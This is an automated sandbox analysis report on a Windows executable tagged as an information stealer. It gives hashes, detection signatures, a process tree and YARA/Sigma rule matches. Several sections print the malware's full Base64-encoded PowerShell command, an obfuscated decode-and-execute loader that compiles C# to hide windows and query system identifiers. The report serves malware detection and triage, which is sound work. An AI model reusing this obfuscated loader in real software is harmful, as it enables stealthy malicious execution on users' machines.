Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dGhlYXB0Z3JvdXA=-free.exe

Overview

General Information

Sample name:dGhlYXB0Z3JvdXA=-free.exe
Analysis ID:1583221
MD5:ede0a1c97eaa446541dcfccd6fa9a6a7
SHA1:e578715a247461d460899af7302152c5daf4365e
SHA256:5a94644716cf1ab8c197ecad93562924c3bfb36224b8c0b68e26a252f3e713d8
Tags:EsqueleStealerexeFUDuser-aniko
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Encrypted powershell cmdline option found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dGhlYXB0Z3JvdXA=-free.exe (PID: 6004 cmdline: "C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe" MD5: EDE0A1C97EAA446541DCFCCD6FA9A6A7)
    • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 5308 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 4072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 5592 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1408 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • WMIC.exe (PID: 4676 cmdline: "wmic" csproduct get uuid /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5652INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xbca8c:$b2: ::FromBase64String(
  • 0xbca6b:$b3: ::UTF8.GetString(
  • 0x4074d:$s1: -join
  • 0x40788:$s1: -join
  • 0x40842:$s1: -join
  • 0x40870:$s1: -join
  • 0x40a15:$s1: -join
  • 0x40a38:$s1: -join
  • 0x40cec:$s1: -join
  • 0x40d0d:$s1: -join
  • 0x40d3f:$s1: -join
  • 0x40d87:$s1: -join
  • 0x40db4:$s1: -join
  • 0x40ddb:$s1: -join
  • 0x40e0c:$s1: -join
  • 0x40e2e:$s1: -join
  • 0x40e9d:$s1: -join
  • 0x41323:$s1: -join
  • 0x41345:$s1: -join
  • 0x4139d:$s1: -join
  • 0x413c7:$s1: -join
Process Memory Space: powershell.exe PID: 764INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x116d3d:$b2: ::FromBase64String(
  • 0x116d1c:$b3: ::UTF8.GetString(
  • 0x656b6:$s1: -join
  • 0x672b7:$s1: -join
  • 0x67443:$s1: -join
  • 0x6b8f2:$s1: -join
  • 0xdbeaf:$s1: -join
  • 0xdbeea:$s1: -join
  • 0xdbfa4:$s1: -join
  • 0xdbfd2:$s1: -join
  • 0xdc177:$s1: -join
  • 0xdc19a:$s1: -join
  • 0xdc44e:$s1: -join
  • 0xdc46f:$s1: -join
  • 0xdc4a1:$s1: -join
  • 0xdc4e9:$s1: -join
  • 0xdc516:$s1: -join
  • 0xdc53d:$s1: -join
  • 0xdc56e:$s1: -join
  • 0xdc590:$s1: -join
  • 0xdc5ff:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi64_5652.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    amsi64_764.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQA